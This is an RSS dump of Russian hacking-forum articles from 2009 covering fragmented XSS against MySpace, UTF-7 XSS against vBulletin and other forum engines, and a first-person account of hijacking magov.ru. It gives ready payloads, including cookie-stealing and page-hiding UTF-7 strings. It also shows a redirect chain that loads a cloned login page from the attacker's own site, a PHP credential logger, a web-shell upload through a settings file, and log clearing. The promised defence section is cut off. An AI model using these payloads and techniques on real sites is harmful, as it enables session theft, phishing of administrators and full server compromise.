						&lt;p&gt;XSS фрагментация&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Такой тип атак довольно редок из-за того, что требуется несколько полей ввода, отображающихся на одной странице, при этом для всех должен применяться один и тот же фильтр, который бы пропускал безопасные части скрипта. Другое требование - достаточная глупость или кривость фильтра, он не должен вырезать символы &amp;lt; и &amp;gt; и в то же время допускать строки там, где их быть не должно. Например &amp;lt;body onload=&amp;quot;alert(&#039;XSS&#039;);&amp;quot;&amp;gt; может обрезаться, а body onload=&amp;quot;alert(&#039;XSS&#039;);&amp;quot; уже быть доступным для использования. &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Глобальная идея фрагментации остается прежней - расположить сами по себе не опасные части скрипта в опасных местах. Простейшее такое место - внутри другого тега.&lt;/p&gt;
						&lt;p&gt;MySpace 0day эксплоит&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Свой пример фрагментированной XSS атаки я разработал для сайта MySpace. &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для начала немного теории. В профиле имеется несколько полей для описания собственной персоны - интересы, любимые фильмы и т.п. Возьмем секцию интересов, Музыку и Фильмы. В реале получаемый код выглядит так:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&amp;lt;tr id=MusicRow&amp;gt;&lt;br /&gt;&amp;lt;td valign=&amp;quot;top&amp;quot; align=&amp;quot;left&amp;quot; width=&amp;quot;100&amp;quot; bgcolor=&amp;quot;#b1d0f0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;span class=&amp;quot;lightbluetext8&amp;quot;&amp;gt;Music&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileMusic&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;Music Goes Here!&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;highlightInterests(&amp;quot;ProfileMusic&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;tr id=FilmsRow&amp;gt;&lt;br /&gt;&amp;lt;td valign=&amp;quot;top&amp;quot; align=&amp;quot;left&amp;quot; width=&amp;quot;100&amp;quot; bgcolor=&amp;quot;#b1d0f0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;span class=&amp;quot;lightbluetext8&amp;quot;&amp;gt;Films&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileFilms&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;Films Go Here!&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;/tr&amp;gt;&lt;/p&gt;
						&lt;p&gt;Очевидно, что разделяет два пользовательских поля лишь этот код:&lt;/p&gt;
						&lt;p&gt;&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileMusic&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;Music Goes Here!&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;highlightInterests(&amp;quot;ProfileMusic&amp;quot;); &amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;tr id=FilmsRow&amp;gt;&lt;br /&gt;&amp;lt;td valign=&amp;quot;top&amp;quot; align=&amp;quot;left&amp;quot; width=&amp;quot;100&amp;quot; bgcolor=&amp;quot;#b1d0f0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;span class=&amp;quot;lightbluetext8&amp;quot;&amp;gt;Films&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileFilms&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Интересная его особенность заключается в том, что в нем нет ни одной одинарной кавычки, лишь стандартные двойные.&lt;/p&gt;
						&lt;p&gt;Конечно же мы можем сделать что-нибудь для инкапсулирования этого текста:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&amp;lt;tr id=MusicRow&amp;gt;&lt;br /&gt;&amp;lt;td valign=&amp;quot;top&amp;quot; align=&amp;quot;left&amp;quot; width=&amp;quot;100&amp;quot; bgcolor=&amp;quot;#b1d0f0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;span class=&amp;quot;lightbluetext8&amp;quot;&amp;gt;Music&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileMusic&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;body test=&#039;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;highlightInterests(&amp;quot;ProfileMusic&amp;quot;); &amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;tr id=FilmsRow&amp;gt;&amp;lt;td valign=&amp;quot;top&amp;quot; align=&amp;quot;left&amp;quot; width=&amp;quot;100&amp;quot; bgcolor=&amp;quot;#b1d0f0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;span class=&amp;quot;lightbluetext8&amp;quot;&amp;gt;Films&amp;lt;/span&amp;gt;&lt;br /&gt;&amp;lt;/td&amp;gt;&lt;br /&gt;&amp;lt;td id=&amp;quot;ProfileFilms&amp;quot; width=&amp;quot;175&amp;quot; bgcolor=&amp;quot;#d5e8fb&amp;quot; style=&amp;quot;WORD-WRAP: break-word&amp;quot;&amp;gt;&lt;br /&gt;&#039;&amp;gt;Films Go Here!&lt;br /&gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&amp;#160; &amp;#160; Как вы видите, мы просто заключили этот текст в параметр text тега body! Теперь мы можем написать требуемый скрипт во втором поле&amp;#160; - на требуемой нам опасной позиции! &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Следовательно, если мы сделаем параметр Films таким:&lt;/p&gt;
						&lt;p&gt;&#039; onLoad=&amp;quot;alert(&#039;XSS&#039;);&amp;quot;&amp;gt;&amp;lt;/body&amp;gt;&lt;/p&gt;
						&lt;p&gt;то мы и получим реальную возможность выполнить произвольный сценарий в контексте уязвимого сайта.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Именно такая атака использовалась для взлома MySpace. Я полагаю, что ее аналоги могут работать на множестве других сайтов, где пользовательский ввод делиться и разрешаются теговые скобки.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:50:34 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=25#p25</guid>
		</item>
		<item>
			<title>Использование UTF-7 в атаках класса XSS</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=24#p24</link>
			<description>&lt;p&gt;Теоретические аспекты&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как известно, основной метод борьбы с XSS - это фильтрация специальных символов во входном или выходном потоке. При этом традиционно фильтруются символы &amp;lt; &amp;gt;, а также &amp;quot; &#039; &amp;amp; %. Все эти символы имеют ASCII код меньший 128, и поэтому, в большинстве кодировок кодируются одним байтом, значение которого совпадает с ASCII-кодом символа.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Но это справедливо не для всех кодировок. Рассмотрим такую кодировку, как UTF-7 . Эта кодировка создавалась для передачи данныx в системах, которые игнорируют старший бит в байте символа (в основном это почтовые сервисы). В этой кодировке используются символы + - ! а также буквы латинского алфавита и цифры. Остальные символы кодируются цепочками вида +XXX- где XXX - некоторая последовательность латинских букв. Так, например, символ &amp;lt; кодируется как +ADw-, символ &amp;gt; как +AD4-.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Поскольку, знак + фактически никогда не фильтруется, то произвольный текст (в том числе и HTML-код) в кодировке UTF-7 беспрепятственно проходит сквозь&amp;#160; серверные скрипты.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Попадая в пользовательский браузер, этот текст, при определеных условиях, может быть расшифрован браузером и восприняться как HTML-код, что влечет за собой возможность проведения XSS атаки. Если атакующему удастся &amp;quot;убедить&amp;quot; браузер клиента в том, что страница представлена в кодировке UTF-7, то XSS можно считать состоявшимся.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Рассмотрим условия, при которых браузер может воспринять текст как UTF-7 кодировку. Все дальнейшие примеры приводятся для IE6. Другие барузеры наверняка используют другую систему декодирования, и поэтому приведенный код, почти наверняка, в них работать не будет.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Рассмотрим механизм определения браузером кодировки загруженной страницы. Прежде всего, браузер анализирует поле Content-Type из заголовка HTTP ответа сервера. Если это поле содержит информацию о кодировке страницы, то браузер именно ее и использует для расшифровки текста. Например, такой заголовок Content-Type: text/html; charset=windows-1251 свидетельствует о том, что кодировка страницы - win-1251.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Далее, если в теле HTML страницы присутствует тег &amp;lt;meta&amp;gt;, в котором указана кодировка страницы, то браузер изменяет текущую кодировку на указанную. Это происходит даже если в заголовке HTTP была указана другая кодировка. При этом, даже та часть страницы, которая уже проинтерпретировалась (до тега &amp;lt;meta&amp;gt;) перекодируется в соответствии с новой кодировкой. Несмотря на то, что преимущество тега &amp;lt;meta&amp;gt; над полем Content-Type явно не оговорено в стандартах языка, тем не менее IE поступает именно так. Например тег &amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot; content=&amp;quot;text/html; charset=ISO8859-1&amp;quot;&amp;gt; заставляет рассматривать страницу в кодировке ISO8859-1, даже если в загловке HTTP было указано Content-Type: text/html; charset=windows-1251.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Если в теле страницы, тег &amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot;&amp;gt; встречается несколько раз, то во внимание принимается только первый из них. Остальные игнорируются (пример). &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В дальнейшем пользователь может поменять кодировку уже загруженной страницы, воспользовавшись пунктом Вид/Кодировка главного меню браузера.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь рассмотрим поведение браузера, если ни в заголовке HTTP, ни в метатегах, кодировка не указана. Если в браузере выствлен флажок Автовыбор кодировки (Вид/Кодировка/Автовыбор), то браузер пытается сам определить кодировку страницы. В процессе загрузки, он анализирует цепочки символов, и если встречается цепочка в известной браузеру кодировке, то он считает что вся страница представлена именно в этой кодировке.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В процессе&amp;#160; определения кодировки, просматривается не весь текст HTML а только содержимое тегов. Значения атрибутов тегов - не просматриваются (либо просмтривается, но позже, после загрузки всего текста). То есть такую страницу &amp;lt;font&amp;gt;Мама мыла раму&amp;lt;/font&amp;gt; браузер распознает как windows-1251, а вот такую &amp;lt;font title= &amp;quot;Мама мыла раму&amp;quot;&amp;gt;Happy birthday to you&amp;lt;/font&amp;gt;&amp;#160; - нет. Кроме того, просматриваются только первые 4 килобайта HTML-кода. Остальная часть на кодировку влияния не оказывает и будет интерпретирована в той кодировке, которая была определена по первым четырем килобайтам.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Следует отметить, что распознавание кодировки, парсинг HTML тегов, и выполнение встретившихся скриптов происходит одновременно. Таким образом, если кодировка еще не определена, и встречается скрипт, зашифрованный в некоторой кодировке, например UTF-7, то браузер считает, что кодировка документа UTF-7, расшифровывает и выполняет скрипт, и только затем парсит оставшуюся часть документа. При этом, даже если впоследствии окажется, что кодировка иная (например встретился метатег с явным указанием кодировки, или были обнаружены русские буквы), скрипт все равно выполнится (пример). &lt;br /&gt;Практические аспекты&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В качестве примеров, рассмотрим несколько форумных движков на предмет подверженности XSS атакам с помощью кодировки UTF-7.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ниже приведено начало HTML-страницы одного из самых распространенных в мире форумов -&amp;#160; vBulletin(версия 3.0.7, пример взят с одного из известных зарубежных сайтов): &lt;/p&gt;
						&lt;p&gt;&amp;lt;!DOCTYPE html PUBLIC &amp;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&amp;quot; &amp;quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;html dir=&amp;quot;ltr&amp;quot; lang=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;description&amp;quot; content=&amp;quot;Post your question about installing or upgrading to vBulletin 3.&amp;#160; Be sure to search, and check the installation docs before you post!&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt;vBulletin Community Forum - vBulletin 3 Installation and Upgrades&amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot; content=&amp;quot;text/html; charset=ISO-8859-1&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;generator&amp;quot; content=&amp;quot;vBulletin 3.0.7&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;keywords&amp;quot; content=&amp;quot;vbulletin,forum,bbs,discussion,jelsoft,bulletin board&amp;quot; /&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;description&amp;quot; content=&amp;quot;This is a discussion forum powered by vBulletin. To find out about vBulletin, go to &lt;a href=&quot;http://www.somesite.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.somesite.com/&lt;/a&gt; .&amp;quot; /&amp;gt; ....&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Заголовок HTTP Content-Type данного сайта не устанавливал кодировку (что, в общем-то, характерно для англоязычных сайтов), что делалает его потенциально уязвимым к описываемой атаке.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как видим, в странице указан метатег с кодировкой ISO-8859-1, что однозначно определяет кодировку страницы. Однако обратим внимание на то, что тег &amp;lt;title&amp;gt;, куда заносится тема текущего топика, находится перед метатегом (отмечено желтым). А это значит, учитывая описанные особенности парсинга, что если в тег title будет внедрен скрипт в кодировке UTF-7, то он будет раскодирован и выполнен. Таким образом, для проведения XSS атаки, достаточно создать в форуме тему, название которой будет зашифровано в кодировке UTF-7 и содержать вредоносный скрипт.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для корректного внедрения скрипта, нужно закрыть тег &amp;lt;title&amp;gt;, а затем внедрить тег &amp;lt;script&amp;gt;. В целом, внедряемый эксплойт может выглядеть так: &amp;lt;/title&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt; , что в кодировке UTF-7 выглядит следующим образом: &lt;/p&gt;
						&lt;p&gt;+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как видим, эта строка не содержит ни одного фильтруемого символа, и без проблем может быть использована для внедрения в форум. В результате создания темы с таким именем, тег &amp;lt;title&amp;gt; примет вид:&lt;/p&gt;
						&lt;p&gt;&amp;lt;title&amp;gt;vBulletin Community Forum - +ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-&amp;lt;/title&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Результирующая HTML-страница созданной темы можно посмотреть на примере (еще раз обращу внимание, что для срабатывания эксплойта, страница должна просматриваться в IE с включенным режимом автоопределения кодировки). Как видим, скрипт действительно срабатывает, и может быть использован для отправки на CGI-сниффер куков любого пользователя, просматривающего созданную тему.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Кроме того, внедренный HTML-текст может содержать любые теги, что позволяет не только отправить куки на сайт атакующего, но и скрыть факт внедрения вредоносного скрипта на страницу. Например, внедрение такой строки +ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-+ADw-comment+AD4-делает текст, идущий после строки, содержимым тега &amp;lt;comment&amp;gt;, что сделает страницу просто невидимой (пример ). Примечательно еще и то, что в таком случае, вся страница оказывается в кодировке UTF-7, поскольку метатег, определяющий истинную кодировку страницы, оказывается внутри комментария, и, естественно, не обрабатывается. Таким образом, при постинге сообщений в данную ветку форума, можно вставлять произвольный HTML-текст в формате UTF-7, и этот текст действительно будет парсится как HTML (пример ).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Описанная уязвимость характерна не только для vBulletin 3.*, но и практически для всех распространенных форумных движков, например vBulletin 2.* ,IPB 1.*, IPB 2.*, Phorum, и других. Во всех этих движках, тема ветви форума вставляется в тег &amp;lt;title&amp;gt;, а сам тег titleидет перед метатегом кодировки.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Более того, многие англоязычные версии форумов вообще не устанавливают ни заголовок HTTP Content-Type, ни метатег &amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot;&amp;gt;, видимо надеясь на то, что латинские буквы нормально отобразятся в любой кодировке. В результате - они все подвержены данной уязвимости. Единственное условие срабатывания для них XSS атаки - это подходящий тип и настройки пользовательского браузера ( IE + автовыбор кодировки ).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Исключение тут составляет phpBB, который не подвержен данной уязвимости, поскольку, видимо случайно, тег &amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot;&amp;gt; предшествует тегу &amp;lt;title&amp;gt;:&lt;/p&gt;
						&lt;p&gt;....&amp;lt;meta http-equiv=&amp;quot;expires&amp;quot; content=&amp;quot;0&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;page-type&amp;quot; content=&amp;quot;Software-Download&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;meta name=&amp;quot;robots&amp;quot; content=&amp;quot;INDEX,FOLLOW&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot; content=&amp;quot;text/html; charset=iso-8859-1&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt;MySQL Problem :: phpBB.de&amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;/css.css&amp;quot; type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;....&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Возможная область действия данной атаки, естественно, не ограничивается форумами. Ведь аналогичные эксплоиты могут бытьвнедрены практически в любые динамически обновляемые страницы. Это и чаты и BBS, и почтовые сервисы, гостевые книги, блоги, он-лайн журналы и т.д. А ведь подавляющее число этих сервисов никак не фильтруют символы UTF-7, и фактически допускают свободное внедрение XSS в этой кодировке.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В заключение, хотелось бы остановиться на подверженности описанной уязвимости русскоязычных сайтов . Как ни странно, но они более защищены от атаки, чем англоязычные. Во-первых потому, что русскоязычные сайты (да и вообще сайты, использующие национальные кодировки)&amp;#160; гораздо чаще используют задание кодировки непосредственно на сервере, и передают ее через HTTP Content-Type, что делает атаку невозможной. И кроме того, особенности парсинга HTML не дают сработать UTF-7 кодировке, если в телетегов, в первых 4kb текста, встретится киррилица. Это связано с тем, что буквы национального алфавита, как правило, имеют ASCII-код более 127, а такие коды не могут быть использованы в 7-битном UTF-7, и потому браузер не сможет интерпретировать страницу в этой кодировке.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Впрочем, последнее преимущество не всегда очевидно. Дело втом, что современные форумы очень громоздки, и первые 4kb, как правило, занимают блоки CSS и скриптов, и не содержат в себе тегов с кириллицей. Таким образом, даже если на странице присутствует киррилица, это еще не означает, что сайт не подвержен UTF-7 атаке.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:49:32 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=24#p24</guid>
		</item>
		<item>
			<title>CSS на практике или как был взломан magov.ru</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=23#p23</link>
			<description>&lt;p&gt;В данной статье я намерен описать один из взломов, проведенных мной с использованием техники xss атак. А так же доказать начинающим веб-программистам, что не такая мелочь – этот xss. В данной статье не будет глупых попыток увести куки админа – здесь этому виду атак дана новая жизнь. В первую очередь я рекомендую прочитать статью веб-программистам, наивно полагающим, что их скрипты в безопасны. После прочтения многие из вас изменят свое мнение.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В этом году я провел небольшой тест, на безопасность веб ресурсов, написанных «начинающими программистами». И что вы думаете? Каждый третий из проверяемых мной сайтов был подвержен xss атаке, т.к. сегодняшние малограмотные программисты очень плохо представляют себе все тонкости этого дела. Далее я намерен описать реальный случай из моей практики, который является четким шаблоном успешной Cross site scripting атаки. Все нижеизложенное предназначено только для ознакомления и закрытия дыр, в первую очередь в головах программистов.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта история началась с того, что я нашел в рунете один небольшой портальчик. Сам по себе он был бесполезен и неинформативен. Там были какие-то бесполезные статьи о жизни, чат и форум. Но меня заинтересовало другое. Данный сайт базировался не на каком либо известном движке, а был самостоятельно написан на php. После прочтения информации о сайте я в этом убедился. У меня сразу же возникло ужасное желание протестировать его на защищенность. На этом сайте, при регистрации создавался один аккуант на чат, форум и администраторскую часть (разумеется, туда пускали только «особых членов»). Т.е. если удастся спереть логин и пароль админа, то с сайтом я смогу творить что угодно. Это и стало главной задачей.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Сервер работал по стандартной схеме. Если вы не авторизированны, то в правом верхнем углу экрана вы можете ввести логин/пароль для входа на сайт. Гостю были доступны только некоторые (самые убогие) разделы сайта. Это сразу привлекло мое внимание. Первым делом я ввел левый логин и оформил запрос, нажав на кнопку «Войти». Хорошо, я получил ошибку «Данный юзер не существует» и скрипт впечатал мой логин в соответствующее поле на форме. Я знал, что скрипт будет печатать логин на форме, следовательно далее проверяем на стандартную xss. Интересно, предусмотрело ли юное дарование, что я не совсем традиционно оформлю запрос? Ответ оказался – нет, не предусмотрело. После ошибки, мой логин был любезно напечатан на странице приблизительно такой строкой php кода:&lt;/p&gt;
						&lt;p&gt;&amp;lt;input type=text name=login value=”&amp;lt;?=$login ?&amp;gt;”&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как я узнал позже, это предположение оказалось правильным. Вот именно из-за этой строчки возможно выполнение xss атаки. Если кто не понял – объясняю. Скрипт не проверяет вводимые пользователем данные и не переводит их в html символы, а затем просто печатает их в теге input свойства value. Это является грубейшей ошибкой, т.к. если правильно оформить запрос (см ниже), то мы выйдем за пределы тега input и выполним свой код(не php): &lt;/p&gt;
						&lt;p&gt;“&amp;gt;&amp;lt;h1&amp;gt;stuped_lamer &lt;br /&gt;(если кто не понял, это я ввел в поле “логин”) &lt;/p&gt;
						&lt;p&gt;Символами “&amp;gt; мы выходим из этого тега, а далее просто пишем свой код. В данном случаем выполнится &amp;lt;h1&amp;gt;stuped_lamer. &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Отлично! XSS атака возможна, далее, главной задачей является получение логина и пароля администратора. Следующим шагом я зарегился у них на сервере. После входа под моим ником мне стала видна табличка с надписью «кто сейчас на сайте». Там я увидел, что какой-то крендель с полномочиями охранника (не админа!) сидит в чате. Иду за ним. Чат был тоже самописным. Возможно там тоже были дыры, но искать я их не стал – это был «план Б».&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вся атака, глазами «охранника» выглядела примерно вот так - у него закончилось время действия сессии, далее его перекинуло на главную страницу сервера (это было отчетливо видно в адресной строке!) для авторизации. Теперь я расскажу, как это выглядело «по ту сторону фокуса». Разумеется, все эти манипуляции с «охранником» сотворил мой скрипт, который он сам выполнил, зайдя по моей ссылки. Заставить его нажать на злополучную ссылку не составило никакого труда. Как оказалось, сидевший в чате охранник был автором какой-то статьи с этого сервера. Ну вот я и указал ему сайт, на котором кто-то копировал его труды и изменял авторство =)) В чате был специальный тег, позволяющий вставлять ссылки в чат. При этом и сама ссылка и заголовок устанавливались разными. Т.е. нажав на &lt;a href=&quot;http://domain.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://domain.com&lt;/a&gt; его кидало не на на &lt;a href=&quot;http://domain.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://domain.com&lt;/a&gt;, а на дырявую страницу его сайта, где и выполнялся скрипт, приложенный к адресу.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для тех кто не понял объясняю детально. Я знал, что скрипт авторизации дырявый и передаются в него логин, пароль и имя кнопки отправки, т.к. иначе скрипт отображал поля ввода и кнопку. Скрипт назывался login.php. Просмотрев форму отправки в html виде я понял, что в параметрах name и pass – передаются логин и пароль соответственно. Имя кнопки отправки – submit. Следовательно, если зайти по ссылке http://адресс_сайта/login.php?pass=&amp;amp;login=”&amp;gt; &amp;lt;h1&amp;gt;Hello_admin&amp;amp;submit - выполнится наш скрипт, который мы передаем в переменной login. Разумеется, здороваться с админом нам не нужно, поэтому в переменной логин нужно предать другой скрипт. Он должен реально закрыть сессию админа, перекинуть его на главную страницу и перехватить введенный от туда логин и пароль.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Все просто. Приступаем. С закрытием сессии все было совсем просто. В каждый скрипт передавался, методом get, номер сессии, и если его не получали, то вас считали гостем и закрывали сессию. Сайт состоял из фреймов, их было три: на авторизацию, разделы сайта и самый основной, для загрузки страниц. Фрейм на авторизацию назывался avtorizacia, т.е. если зайти по ссылке &amp;lt;a target=”avtorizacia” href=http://my_sait/page.php&amp;gt;ссылка&amp;lt;/a&amp;gt; - то http://my_sait/page.php откроется не в новом окне, а именно во фреме авторизации сайта. Т.е. для выполнения задуманного, нам необходимо, чтобы охранник зашел по трем ссылка. Одна – закрытие авторизации и перекидывании на главную страницу сервера (адресная строка это подтверждает). Вторая – на подмену фрейма авторизации, чтобы там грузилась наша пага, идентичная той. Третья ссылка – и есть сайт с клонированной статьей (чтобы охрана не заподозрила меня во взломе, – читай для отвода глаз), я дал ссылку на еррор 404.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Финальный вариант ссылки с редиректами выглядит примерно вот так:&lt;/p&gt;
						&lt;p&gt;“&amp;gt;http://адресс_сайта/login.php?pass=&amp;amp;login=”&amp;gt; &amp;lt;script&amp;gt;window.location.href=&#039;/index.php&#039;;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;window.location.href=&#039;http://адресс_моего_сайта/login.php &#039; target=avtorizacia;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;window.location.href=&#039;http://super_sait.com&#039;;&amp;lt;/script&amp;gt;&amp;amp;submit&lt;/p&gt;
						&lt;p&gt;Так же у меня был сайт на holm.ru где лежало два скрипта: один login.php – идентичный ихнему, он отсылал запрос на второй файл, второй - save.php для сохранения переменных:&lt;/p&gt;
						&lt;p&gt;&amp;lt;?php&lt;br /&gt;$open=fopen(lamer.html, “a+”);&lt;br /&gt;fwrite($open, “Имя: $login Пароль: $pass &amp;lt;hr&amp;gt;”);&lt;br /&gt;echo “Проверьте правильность логина/пароля и повторите попытку”:&lt;br /&gt;?&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вот так я и получил акаунт охранника. Далее я зашел в администраторскую часть сайта. Я сразу обломался и понял, что у меня практически нет никакой власти. Единственное, что я мог - модерировать форум, чат, банить юзеров, а так же имелся доступ к настройкам этого портала. В настройках был доступен один файл с расширением php, где хранились все настройки цвета, шрифтов и т.п. Это сразу же вызвало улыбку =)). Даже не думал заливать туда вот такую фигню , а скопировал туда php код своего шела. После этого написал в адресной строке полный путь до этого файлика и узрел знакомый face своего скрипта. Получается, что доступ к настройкам не был закрыт из вне? Просто сказочное ламерство! &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вот так просто я получил полный доступ к дирам сайта. Ничего дефейсить я там не стал, почистив логи просто свалил. Потом написал письмо админу сайта о найденном баге. Ответа я так и не получил, но спустя пару дней xss’ки на сайте уже не было =))&lt;/p&gt;
						&lt;p&gt;Защита&lt;/p&gt;
